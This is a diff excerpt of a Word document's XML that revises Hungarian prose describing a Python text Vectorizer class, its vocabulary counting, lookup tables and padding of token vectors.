-        <w:t>__</w:t>
+        <w:t>__init__</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18268,7 +16382,6 @@
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -18277,7 +16390,6 @@
         </w:rPr>
         <w:t>Vectorizer</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -18320,7 +16432,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -18329,7 +16440,6 @@
         </w:rPr>
         <w:t>filename</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -18346,19 +16456,13 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">annak a felső határát, hogy </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">egy sorban </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">hány szó fordul elő </w:t>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">zoknak a tokeneknek a maximális száma, amelyeket megkülönböztetünk egymástól </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18366,7 +16470,6 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -18375,7 +16478,6 @@
         </w:rPr>
         <w:t>max_vocab</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -18392,13 +16494,37 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">a felső határát, hogy </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">hány szó van </w:t>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">nnak a maximális száma, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">hogy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">hány </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>token</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> van </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18412,7 +16538,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -18421,7 +16546,6 @@
         </w:rPr>
         <w:t>max_length</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -18446,7 +16570,6 @@
         </w:rPr>
         <w:t>va van egy számláló (</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -18455,7 +16578,6 @@
         </w:rPr>
         <w:t>word_freqs</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -18468,52 +16590,46 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">word2index, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>word2index, indextoword</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, egy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>mátrix</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>indextoword</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, egy </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>táblázat</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t>dataset</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -18549,19 +16665,11 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>collectVocab</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">collectVocab: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18579,89 +16687,131 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t xml:space="preserve">ciklussal bejárja </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t xml:space="preserve">a </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>word_freqs</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> változóba</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> teszi a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve">dataset </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">.oszlopának </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>sorait</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, szóköz alapján szétválasztja </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a token</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>sorozatot</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">és </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">az egyes tokeneket az </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>előfordulási szám</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ukkal a </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>dataset</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>0.oszlopá</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">nak szavait </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">és </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>előfordulási szám</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>uk</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>at, utóbbi</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> szerint csökkenő sorrendben.</w:t>
+        <w:t>word_freqs</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> változóba teszi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A collection.Counter típusából adódóan biztosítja a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">változón belül a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>csökkenő sorrendet.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -18678,19 +16828,11 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>createLookupTables</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">createLookupTables: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18708,19 +16850,37 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">, ami </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">amely </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">indexekkel </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>keresőtáblá</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>kat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> készít a </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18728,137 +16888,39 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>word2index</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">változóba teszi </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>word_freqs</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tokenjei</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>nek</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, ezek a </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>word_freqs</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> szavait</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">sorrendnek megfelelően </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">és </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">2-től </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>indexelve</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> egy</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>-egy</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>indexet</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> társít hozzájuk</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> A</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> nulladik és első index</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a *** és ismeretlen szavakhoz van fenntartva</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> A </w:t>
+        <w:t>word2index</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> és az </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18866,39 +16928,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">word2index </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>változóba</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>value</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">index, az </w:t>
+        <w:t>indextoword</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18906,45 +16936,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>index2word-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>be pedig index</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>value</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>formában kerülnek be a szavak</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> az indexükkel.</w:t>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -18961,19 +16953,11 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>createVectors</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">createVectors: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18993,41 +16977,129 @@
         </w:rPr>
         <w:t xml:space="preserve">a </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>dataset</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve">dataset </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">.oszlopának </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>z</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">étdarabolt </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tokenjein</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, és a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">keresőtábla alapján a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>hozzájuk tartozó</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">indexet </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">az </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t xml:space="preserve">X </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>változóba</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>0.oszlopának</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> szavain, és a hozzájuk tartozó</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>listázza</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Amennyiben </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">az </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19035,25 +17107,19 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>word2indenx</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>-beli</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> indexet </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">az </w:t>
+        <w:t>X</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> változó</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> hossza kevesebb, mint a </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19061,118 +17127,110 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">X </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>változóba</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> gyűjti</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>. Ennek</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> hosszát később módosítja a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>max_length</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>max_length</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">értéke, a különbséget nullákkal tölti fel. Ha a hossza nagyobb, a különbséget levágja a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>lista</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> végéről. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Így</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a vektorok hossza </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>egységes marad.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Másrészt a </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">változóban </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>megadottra, így a vektorok hossza egységes marad.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
